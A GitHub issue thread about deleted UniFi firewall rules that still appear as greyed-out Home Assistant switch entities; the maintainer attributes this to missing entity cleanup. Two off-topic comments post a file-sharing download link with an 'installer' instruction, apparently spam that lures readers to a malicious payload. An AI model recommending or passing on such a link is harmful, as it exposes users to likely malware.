### ISSUE TITLE
Unknown rules in Home Assistant

### ISSUE THREAD

**Issue by Cippo2019** [Kane610/aiounifi#720]
HI 

I am trying to understand that part

![image](https://github.com/user-attachments/assets/2b4ee6f7-1158-4f87-abdc-a0891934015d)

thats rules are not into my switches and aslo they are not into my firewall rules
I created that rule some days ago and after i deleted it

I see now that in HA and seems existing but i dont have reference into unifi GUI

should be not that one right ?
//Switch
Block network access for clients
Allow control of network access to clients configured in the integration options by adding MAC addresses. Items in this list will have a Home Assistant switch created, using the UniFi Device name, allowing for blocking and unblocking.
//

thanks in advance

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Cippo2019** [comment]
> Download https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU In the installer menu, select "gcc."

and what is it ?

**Comment by Cippo2019** [comment]
yes I checked and on the UNIFI GUI they are not there.
that's why I ask.
it seems that the integration module sees them active, as in the screen, but on the GUI they are not there.
I certainly created them, but then I deleted them.

**Comment by Cippo2019** [comment]
it is ok my answer or it is not enough clear ? 

let me know 
wbr

**Comment by Kane610** [comment]
I didn't implement this part myself so dont know. if you could provide debug data maybe some conclusion could be made about why you still see them

**Comment by Cippo2019** [comment]
last night I updated to version Unifi 8.4.59 and after reloading the integration the entities were grayed out, so as if they were no longer there. I think therefore an error of the unifi software layer and not of the integration.

**Comment by Kane610** [comment]
It is probably that there are not a proper clean up implemented for these entities

**Comment by Cippo2019** [comment]
Hi
what do you mean? I didn't do anything. I found them within the integration. my unifi implementation is new. I just tried creating some ACLs then deleting them.

Inviato da Outlook per Android<https://aka.ms/AAb9ysg>
________________________________

**Comment by Kane610** [comment]
From what I understand with what you have written "I certainly created them, but then I deleted them." if they where read by home assistant and created the entities and then you removed the rules, HA does not yet clean those up, so you would see them listed but not loaded

**Comment by Cippo2019** [comment]
Yes you are right

I have deleted that because after some days even deleted they were still present in HA (but in gray).

;-)

Inviato da Outlook per Android<https://aka.ms/AAb9ysg>
________________________________

**Comment by Kane610** [comment]
Then case is closed
